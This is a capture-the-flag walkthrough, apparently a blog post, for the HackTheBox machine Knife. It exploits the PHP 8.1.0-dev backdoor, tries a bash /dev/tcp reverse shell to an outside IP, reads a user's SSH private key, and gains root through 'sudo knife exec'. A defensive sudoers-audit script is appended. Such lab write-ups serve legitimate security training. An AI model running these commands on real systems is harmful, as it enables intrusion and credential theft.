How to Get SSH Access on Knife – HackTheBox

Enumeration

Commands:

nmap -T5 10.10.10.242

AutoRecon running in the background:

autorecon 10.10.10.242

Web enumeration

Commands:

nmap -sC -sV 10.10.10.242 -p 80

No known exploit for Apache 2.4.41…

Not very interesting, so I have to enumerate more.

PHP 8.1.0-dev

As I always run AutoRecon in the background just in case, I check the results of all its scans. The whatweb tool gives me all the versions used by the web server.

To see the results, I use Sublime Text and this command from the scan results directory: subl .

With that, all files are opened automatically in Sublime Text, which saves a lot of time when you have to check the results.

whatweb command:

whatweb 10.10.10.242

When you search for PHP 8.1.0-dev on Google you find some websites that talk about a backdoor remote command injection, like this one: https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html

or this one:

https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor

The first one is a Python script that does the job for you; with the second one you have to change the User-Agent setting of the GET request.

I decide to use the first one.

The usage line says:

python3 php_8.1.0-dev.py -u http://ip/ -c cmd

so I try this command:

python3 php_8.1.0.py -u http://10.10.10.242 -c ls

and I get the content of /.

Then I try to get a reverse shell, without success, with this kind of command line:

python3 php_8.1.0.py -u http://10.10.10.242 -c 'bash -i >& /dev/tcp/10.10.14.4/8080 0>&1'

Initial access - SSH

As always, you have to think about how many ways there are to get into a system. And remember the first nmap scan: two ports are open, 22 and 80. So I check whether a .ssh folder exists in the home directory.

python3 php_8.1.0.py -u http://10.10.10.242 -c 'ls -alR /home/james/'


Command to display the id_rsa key:

python3 php_8.1.0.py -u http://10.10.10.242 -c 'cat /home/james/.ssh/id_rsa'

Then copy the result and put it in a new file on your Kali box.

Change the permissions:

chmod 600 id_rsa

SSH connection

ssh james@10.10.10.242 -i id_rsa

Privilege escalation

One of the first things to do is to check the user's sudo permissions with sudo -l


James has root privileges to run /usr/bin/knife. I spent some time searching how I could use this to get root access.

Finally, I see this part when you execute this command: sudo /usr/bin/knife


But it's not enough; I have to know what language the Knife software uses. Back to Google to search for documentation.

On this page, https://docs.chef.io/workstation/knife_exec/, we can see that knife uses the Ruby language.

I try different Ruby scripts, like this one https://raw.githubusercontent.com/secjohn/ruby-shells/master/revshell.rb. It works, but the shell is too unstable and closes very fast. Even with this little script:

fork { exec("ls") }

Root for just a few seconds…

Finally, I try this command line:

sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"

Got root privileges!!!
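The lesson from this escalation is that a sudo rule on a tool that evaluates code (here knife exec runs Ruby) is effectively a sudo rule on a shell. As an added example that is not part of the write-up, here is a small Python audit over constructed sudoers content that flags such rules; the SHELL_CAPABLE table and the SAMPLE lines are hypothetical.

```python
import re
# Sudo rules that hand the caller an interpreter amount to full root: on Knife,
# `knife exec` evaluates Ruby, so NOPASSWD on /usr/bin/knife is root. Table is a
# hypothetical starting point for this example, not a complete list.
SHELL_CAPABLE = {
    "/usr/bin/knife": "knife exec evaluates arbitrary Ruby as the run-as user",
    "/usr/bin/ruby": "interpreter, runs arbitrary code as the run-as user",
}
# sudoers user specification: user host=(runas) [TAG: ...] cmd[, cmd ...]
RULE_RE = re.compile(r"^(?P<user>\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?"
                     r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_rule(line):
    """Parse one sudoers user spec; None for blank, comment or Defaults lines."""
    line = line.split("#", 1)[0].strip()
    m = RULE_RE.match(line) if line and not line.startswith("Defaults") else None
    if not m:
        return None
    return {
        "user": m.group("user"),
        "nopasswd": "NOPASSWD" in re.findall(r"[A-Z]+(?=:)", m.group("tags")),
        "cmds": [c.strip() for c in m.group("cmds").split(",") if c.strip()],
    }

def audit_sudoers(text):
    """Return (user, command, reason) for each rule that amounts to code execution."""
    findings = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is None:
            continue
        for cmd in rule["cmds"]:
            binary = cmd.split()[0]
            if binary == "ALL":
                reason = "unrestricted command list"
            elif binary in SHELL_CAPABLE:
                reason = SHELL_CAPABLE[binary]
            else:
                continue
            if rule["nopasswd"]:
                reason += " (no password required)"
            findings.append((rule["user"], cmd, reason))
    return findings

# Constructed sample sudoers content; the james line mirrors the write-up.
SAMPLE = """\
root    ALL=(ALL:ALL) ALL
james   ALL=(root) NOPASSWD: /usr/bin/knife
deploy  ALL=(root) /usr/bin/systemctl restart nginx
"""
```

Running audit_sudoers over a real /etc/sudoers (and the files under /etc/sudoers.d) lists every rule that should be rewritten to a fixed, non-interpreting command.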


That’s all folks

Thank you for taking the time to come to the site and read this write-up.

I hope you enjoyed it and that it taught you something new.

Don't hesitate to leave a comment or share this article.
